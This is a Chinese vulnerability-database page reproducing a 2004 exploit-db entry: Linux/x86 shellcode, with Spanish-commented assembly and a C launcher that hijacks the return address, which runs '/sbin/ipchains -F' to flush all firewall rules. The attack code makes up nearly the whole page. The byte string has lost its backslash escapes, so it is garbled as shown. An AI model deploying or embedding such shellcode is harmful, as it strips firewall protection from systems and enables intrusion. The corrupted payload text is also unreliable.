Linux/x86 – Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)-安全小百科

Linux/x86 – Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)

漏洞ID	1054651	漏洞类型
发布时间	2004-09-26	更新时间	2004-09-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13441

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

#include <stdio.h>
#include <string.h>

/* 
__asm__("

sub     $0x4,%esp   ## Con esto conseguimos que la shellcode nunca se
popl    %esp        ## sobreescriba... gracias RaiSe :)

xorl    %edx,%edx   ## %edx a cero
pushl   %edx        ## y ponemos los zeros del final del string en memoria
pushw   $0x462d     ## tenemos -F0000

movl    %esp,%esi   ## wardamos argv[1] en %esi

pushl   %edx        ## 0000-F0000

pushl   $0x736e6961
pushl   $0x68637069 ## ipchains0000-F0000

movl    %esp,%edi   ## wardamos argv[0] en %edi

pushl   $0x2f6e6962
pushl   $0x732f2f2f ## ///sbin/ipchains0000-F0000

movl    %esp,%ebx   ## en %ebx, el nombre de archivo

pushl   %edx        ## 0000///sbin/ipchains0000-F0000
pushl   %esi        ## A[1]0000///sbin/ipchains0000-F0000
pushl   %edi        ## A[0]A[1]0000///sbin/ipchains0000-F0000

movl    %esp,%ecx   ## %ecx apunta a el inicio del argv[]

xorl    %eax,%eax
movb    $0xb,%al
int     $0x80

");
*/

char c0de[]=
"x83xecx04x5cx31xd2x52x66x68x2dx46x89xe6x52x68x61x69x6ex73"
"x68x69x70x63x68x89xe7x68x62x69x6ex2fx68x2fx2fx2fx73x89xe3"
"x52x56x57x89xe1x31xc0xb0x0bxcdx80";


/* execve("///sbin/ipchains",ARGV,NULL);
 * ARGV[] = {"ipchains","-F",NULL}
 */

int main(void)
{
	long *toRET;
	char vuln[52];

	*(&toRET+2) = (long *)c0de;

	strcpy(vuln, c0de);

	printf("Shellc0de length: %dnRunning.......nn", strlen(c0de));
	return(0);
}

/* Sp4rK <[email protected]>
 * UNDERSEC Security TEAM
 * NetSearch E-zine
 */

// milw0rm.com [2004-09-26]

相关推荐: OpenBSD CHPass不安全临时文件符号链接漏洞

OpenBSD CHPass不安全临时文件符号链接漏洞漏洞ID 1107192 漏洞类型信息泄露发布时间 2003-02-03 更新时间 2003-12-31 CVE编号 CVE-2003-1366 CNNVD-ID CNNVD-200312-419 漏…

文章版权归作者所有，未经允许请勿转载。

THE END